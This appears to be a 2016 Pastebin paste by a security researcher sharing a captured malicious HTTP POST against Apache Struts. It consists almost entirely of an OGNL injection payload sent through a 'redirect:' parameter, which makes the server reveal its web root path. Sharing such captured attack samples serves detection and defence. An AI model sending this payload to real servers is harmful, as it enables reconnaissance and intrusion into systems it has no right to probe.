Neonprimetime

malicious http post apache struts

Aug 1st, 2016
134
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.65 KB | None | 0 0
  1. Malicious HTTP Post
  2. *******
  3. redirect:${
  4. #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
  5. #resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
  6. #resp.setCharacterEncoding('UTF-8'),
  7. #resp.getWriter().print("web"),
  8. #resp.getWriter().print("path:"),
  9. #resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),
  10. #resp.getWriter().flush(),
  11. #resp.getWriter().close()
  12. }
  13. *******
  14. More FROM @neonprimetime security
  15.  
  16. http://pastebin.com/u/Neonprimetime
  17. https://www.virustotal.com/en/USER/neonprimetime/
  18. https://twitter.com/neonprimetime
  19. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment